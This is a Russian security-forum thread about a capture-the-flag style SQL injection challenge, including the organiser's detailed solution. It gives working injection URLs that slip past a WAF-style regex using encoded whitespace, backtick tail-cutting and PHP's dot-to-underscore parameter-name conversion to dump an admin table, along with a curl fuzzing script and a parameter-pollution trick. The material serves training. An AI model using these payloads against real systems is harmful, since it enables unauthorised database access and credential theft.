Задание №1

Прошло две недели.
Окончен прием ответов от групп, итоги такие:
- про МОА известно только то, что Кибер-панк жив и он в хорошей форме.
- за РОА отдувался один crlf, упс проследил SooLFaa, с повышением.
- lvl8 - основная ударная группа, лучшие.
- из паблика прошел только Evan - public champion.

Все молодцы и красавчики.
Хорошая работа.

====

Но задание не закрыто, продолжаем решать.
Настало время подсказок, но поскольку одна уже прошла (backtik), пока просто разжуем то, что известно.

Задание можно условно поделить на две части
- получить вывод на экран
- вывести данные из таблицы admin_site

Начнем с вывода, мешает "хвост" запроса " and kmag=1".
Задача давно известная и решается либо обрезанием хвоста (используем комментирование),
либо достраиваем запрос до валидной конструкции.
Комментарии детектятся фильтром, поэтому достраиваем.
Поле kmag отсутствует в таблице admin_site, запрос валится, ну так залечим быстренько это недоразумение, проблема то совсем маленькая.

==
И да, буду принимать и частичное прохождение:
1 часть - получить вывод
2 часть - протащить в запрос строку "admin_site"

Проходить можно в любом порядке.

 

Перестали поступать ответы, первая часть не требует каких то особых знаний, даже если не помните синтаксис MySQL, достаточно почитать базовые правила.

Если кто то решает, отпишитесь в теме, или в личку.

Или можно закрыть задание и посмотреть прохождения.

 

Да, все варианты прохождения в деталях ОЧЕНЬ интересно посмотреть. Сам не осилил, но пытался.
Как я понял из всего написанного, тут несколько разных вариантов обхода, вот их в деталях бы оценить.

 

Вектор один. А кто как байпасит комменты не суть важно.

 

Наверное никто не будет против, если для тех, кто пытается пройти, я подскажу направление. Сам я не сразу додумался до решения, но один человек натолкнул меня на один .pdf файл.

 

Да меня собственно, больше всего интересует обход символа _ в регулярке.

 

Подсказки даны достаточно хорошие, чтобы даже не решать, а просто записать ответ.
Но при условии, что уже немного повтыкал.

 

У них просто sqlmap не справляется, вот они и в тупике!

 

Просто нет опыта решения задач и нужно некоторое количество разжеванных решений, некоторая начальная база, ступенька, опора.
Дальше будет легче.

 

Спасибо за подсказку, теперь полностью решил

 

Завтра закрою задание.
Можно присылать полусырые ответы, главное чтобы можно было увидеть потенциал.

 

Когда новый таск ждать?

 

Пока не знаю.
Не планировал ничего, был минутный порыв, отчасти внутренний протест против затянувшегося периода нехватки времени.

Но полагаю, если будет интерес, в группах его поддержат обязательно.
Возможно и у меня получится.

 

Задание закрыто

Постараюсь дать более подробное объяснение, чем принято в заданиях, поскольку хочется показать, что никакая это не уличная магия и не развлекаловка исключительно для групп.
Обычная задачка, доступная всякому, освоившему синтаксис мускула и php, и умеющему мыслить логически.
Ну, может быть, иногда нужно включать хакерскую догадку, если конкретных знаний пока недостаточно.

Задание можно разбить на две подзадачи:
- получить вывод информации через SQLi
- вывести информацию, уже конкретно из таблицы admin_site

Смотрим запрос

Code:

$sql="select tovar, dataprice, cena from pricelist where $key = $id and kmag=1";

Инъекция возможна в переменные $_GET['$key'] и $_GET['$id'].
Нам привычнее крутить тут

Code:

select tovar, dataprice, cena from pricelist where $key = {SQLi} and kmag=1

т.е. вызов будет выглядеть так:

Code:

http://localhost/test.php?id={SQLi}

поехали

Code:

http://localhost/test.php?id=0 union select 1,2,3

(далее буду писать только ту часть, что начинается со знака вопроса)
сработает фильтр на пробел

Code:

if(preg_match("|[\[ _\-\]\*(]+|ims", $_SERVER['QUERY_STRING'].urldecode($_SERVER['QUERY_STRING'])))die("Hacking attempt");

тогда заменим пробел на варианты из %09 ,%0а, %0b, %0d

Code:

?id=0%0aunion%0aselect%0a1,2,3
select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3 and kmag=1

запрос невалидный, мешает участок " and kmag=1", поле kmag отсутствует в запросе union select.
Его нужно отрезать комментариями, или достроить до валидного.
Штатные комментарии фильтром запрещены ("-- ","#", "/**/", и даже нештатный ";%00"), поэтому достраиваем запрос.
Я пытался подтолкнуть к использованию backtick "`", как эффективного и красивого аналога многострочного комментария и незаслуженно "забытого" в паблике ачата.

Code:

?id=0%0aunion%0aselect%0a1,2,3`
select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3` and kmag=1

В данном случае, все, что идет после обратной кавычки до конца строки (в т.ч. и символы \r\n) будет воспринято, как алиас поля 3, поскольку закрывающая кавычка отсутствует, что эквивалентно действию многострочного комментария.
т.е. даже если запрос был бы многострочным

Code:

$sql="select tovar, dataprice, cena
            from pricelist where $key = $id
                                and kmag>0
                                and kmag<2";

backtick его бы отрезал аналогично действию

Code:

$sql="select tovar, dataprice, cena
            from pricelist where $key = {SQLi}/* $id
                                and kmag>0
                                and kmag<2 */";

На рдоте такую тему обсуждали, в т.ч. и мемберы ачата.

Или используем вполне себе обычный способ, достраиваем так, чтобы запрос не ломался.

Code:

?id=0%0aunion%0aselect%0a1,2,3%0afrom%0apricelist%0awhere%0a1
select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3 from pricelist where 1 and kmag=1

Итак, появился вывод

Code:

| 2 | 1 | 3 |

Отлично, теперь достанем поля из таблицы admin_site.
Но тут попадаем на конкретный облом, в названии таблицы присутствует символ нижнего подчеркивания "_", который детектится фильтром
и в настоящее время нет возможности его обойти, по крайней мере никто публично не заявил, что смог это сделать.
На форуме вопрос с фильтрацией "_" тоже неоднократно поднимался и вывод пока один - в общем случае не обходится никак.
Что за подвох, задание обязано иметь решение, значит обход все же найден, ладно повтыкаем.
На сколько хватит нашего терпения: на час, на два на день, или больше, не очень важно, главное приходим к выводу - не обходится.

Вторая часть.
Еще раз смотрим, чего то пропустили.
Да почти ничего, разве что сделали допущение - без разницы, в какую переменную делать инъекцию.
foreach($_GET as $key=>$id){
(Здесь $key определяет имя переменной, а $id - ее значение.)
И тут либо вспоминаем эту разницу, либо методом хакерского тыка проверяем инъекцию в $_GET['key'].
А разница действительно есть и она даже описана в документаци к php http://php.net/manual/ru/language.variables.external.php
Смысл в том, что в именах переменных (но не в значениях), переданных через массивы $_GET и $_POST некоторые символы запрещены и преобразуются к знаку подчеркивания "_".
А символы эти - пробел, левая квадратная скобка и точка (" ", "[", ".").

Фигасе! То, что нужно!
Пробел и скобку фильтр детектит, а вот точку пропускает, поэтому окончательный вызов будет таким.

Code:

http://localhost/test.php?0%0aunion%0aselect%0apassword,user,email%0afrom%0aadmin.site`=xek

(здесь "=xek" не несет смысловой нагрузки, просто смайлик )
запрос приобрел вид

Code:

select tovar, dataprice, cena from pricelist where 0 union select password,user,email from admin_site` = xek and kmag=1

и вернул нужные данные из admin_site

Code:

| admin | *4414E26EDED6D661B5386813EBBA95065DBC4728 | webmaster@localhost |

В условиях, когда backtik перестал работать на новых версиях мускула (во всей линейке 5.7), можно достроить запрос таким образом, чтобы хвост "and kmag=1"
не приводил к ошибке выполнения запроса.
В таблице admin_site нет поля "kmag", поэтому запрос валится, но такое поле есть в pricelist, поэтому тем, или иным способом добавим таблицу в запрос и достроим до валидного.
Например так:

Code:

http://localhost/test.php?0%09union%09select%09password,user,email%09from%09admin.site,pricelist%09where%091=1

соответственно запрос приобрел вид

Code:

select tovar, dataprice, cena from pricelist where 0 union select password,user,email from admin_site,pricelist where 1 = 1 and kmag=1

и уже выполняется нормально.

Как искать, когда не знал или не помнил это правило?
Гугл: "php переменная get подчеркивание".

Или сразу - метод хакерского тыка, можно и более надежное средство - фаззер (кто не знаком, обязательно освойте).
Обычно в проблемное место вставляют вывод генератора из 1-3 символов.
Как вариант, свой скрипт быстренько накидать.

Spoiler: Скрипт

Code:

<?
$u1 = 'http://localhost/test.php?0    union    select    password,user,email    from    admin';
$u2='site,pricelist%09where%091=1';
$ch = curl_init();
for ($i=0;$i<256;$i++){
    curl_setopt_array($ch, array(
        CURLOPT_URL => $u1.chr($i).$u2,
        CURLOPT_RETURNTRANSFER => 1,
    ));
    $r = curl_exec($ch);
    if(stripos($r,'admin')>0)    echo $i,"<br>",chr($i),"<br>",$r;
}
curl_close($ch);

Про backtik.
К сожалению этот удобный способ отходит в историю, как в свое время ушел незакрытый комментарий "/*".
Видимо патчили тут
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-29.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-11.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-1.html

Spoiler: Info

Replication: Backtick (`) characters were not always handled correctly in internally generated SQL statements, which could sometimes lead to errors on the slave. (Bug #16084594, Bug #68045)
References: This issue is a regression of: Bug #14548159, Bug #66550.

И остался еще один интересный вопрос, каким образом точка с запятой ";" делает запрос валидным (смотрим прохождения ниже).
Не понимаю, как это работает.
Это точно не php и не mysql.
Есть подозрение, что-то дополнительно обрабатывает запрос, возможно предпроцессор какой то оптимизирует строку запроса.
Очень хотелось бы разобраться в причине такого аномального поведения, как минимум, двух серверов.
Во первых, нужно понимать причину аномалии и условия возникновения.
Во вторых, около этого могут находится и другие интересные эффекты.
Может владельцы помогут прояснить причину.

Прохождения:

Spoiler: Прохождения

 

Задание безусловно, безусловно интересное. В первую очередь благодарю за детально описанные решения, причем несколько.
Но, говорить, что всё это очевидные вещи понятные новичкам... В общем мне это напомнило вот такое обсуждение: https://rdot.org/forum/showthread.php?t=741
Ситуация аналогичная имхо, тем более что уважаемый dooble не понял трюк с ; хотя для некоторых он тоже очевиден.

 

Если имеется ввиду не расщепление запросов (что не может служить терминатором, вот при mq=off работало в связке с ";%00"), то большая просьба объяснить феномен.

Давайте разжуем.
MySQL поддерживает расщепление запросов (можно проверить в консольном клиенте), но клиент php должен обратиться, как

Code:

mysqli::multi_query()
mysqli_multi_query () 

Смотрим http://www.php.net/manual/ru/mysqli.multi-query.php
а в скрипте идет обычное $db->query($sql) и если после ";" будет продолжение строки то восприниматься будет, как ошибка, встретился "конец запроса", а следом идет опровержение, текст запроса продолжается.

Но и в случае mysqli_multi_query () запросы должны быть валидные, а мы после ";" передаем мусор, который мускул не сможет обработать и вывалит ошибку синтаксиса.

Т.е. на этих серверах "нечто" убирает этот мусор, перед тем, как отдать на выполнение СУБД.
Либо существует настройка мускула (о которой я не знаю) и она позволяет обрабатывать запрос только до ";".

Версия на обоих аномальных серверах - 10.1.20-MariaDB, поднимал ее локально для проверки, в конфигурации из коробки реагирует на мусор после ";" привычной ошибкой.

 

dooble, я предполагаю, что все гораздо проще, сейчас возможно кто нибудь скинет ссылку на документацию мускуля или php, где будет всё просто и понятно, возможно с аналогичной формулировкой, мол вы разве такую элементарность не знали?
Ещё раз благодарю за квест, столько нового разом узнал. Я вообще ничего этого не знал, ни про ` ни про замену [ или точки на _, и уж тем более про ; а тут сколько нового.
Подобные квесты, когда их суть сводится к полуприватным(назовем это так) техникам, очень полезны, но иногда чуток бомбит, когда делаются заявления, что это очевидно. Очевидно для того, кто читая мануалы мускуля или php случайно находит какую нибудь фичу, которую можно использовать для байпассов... Ну ссылку на подобные рассуждения на рдоте я кидал.

 

Это правильное разжевывание. Одорямс.)))) Главное показать направление. Это отличный ход.

 

Спасибо за задание,как говорится все проще если вдуматься,но полез куда сложнее))
КрасавчиГ что делаешь такое,
Респект и Уважуха

 

Вот всплыл еще вариант использования, вроде отдельная тема, но грабли те же:

Загрязнение параметров в приложениях на PHP

PHP использует parse_str() для синтаксического анализа параметров, таким образом, что символы "[", "." и "_" воспринимаются как одинаковые. По умолчанию PHP будет использовать последний параметр как действительный.

Таким образом, в случаях, когда PHP работает на бэкэнде, но фронтенд (API шлюз или WAF) проверяет параметр, мы можем передать в PHP поддельные параметры.

http://example.com/hpp.php?account_id=real&account[id=fake

==

Принимается скриптом по типу:

Code:

<?php
echo $_GET['account_id'];